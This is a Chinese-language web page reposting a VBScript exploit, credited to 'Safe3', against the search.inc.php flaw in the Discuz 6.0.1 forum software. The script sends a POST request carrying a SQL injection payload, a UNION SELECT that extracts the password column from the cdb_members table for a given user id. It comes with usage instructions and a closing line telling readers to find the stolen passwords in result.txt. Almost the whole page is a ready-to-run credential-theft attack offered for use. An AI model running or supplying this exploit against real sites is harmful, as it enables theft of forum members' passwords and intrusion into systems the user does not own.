以下是search.inc.php 文件漏洞利用代碼VBS版 代碼如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "POST",strSite & strPath & "index.php", False objXML.SetRequestHeader "Accept", "*/*" objXML.SetRequestHeader "Accept-Language", "zh-cn" objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" objXML.SetRequestHeader "User-Agent", "wap" objXML.send(strUrl) wscript.echo(objXML.ResponseText) Sub showB() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Exploit discuz6.0.1") .Echo("Code By Safe3") .Echo("+--------------------------=====================------------------------------+") End with End Sub Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("用法:") .Echo(" cscript "&.ScriptName&" site path uid") .Echo("例子:") .Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub 獲得的密碼大家自己在result.txt中查找 |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長網(wǎng)微信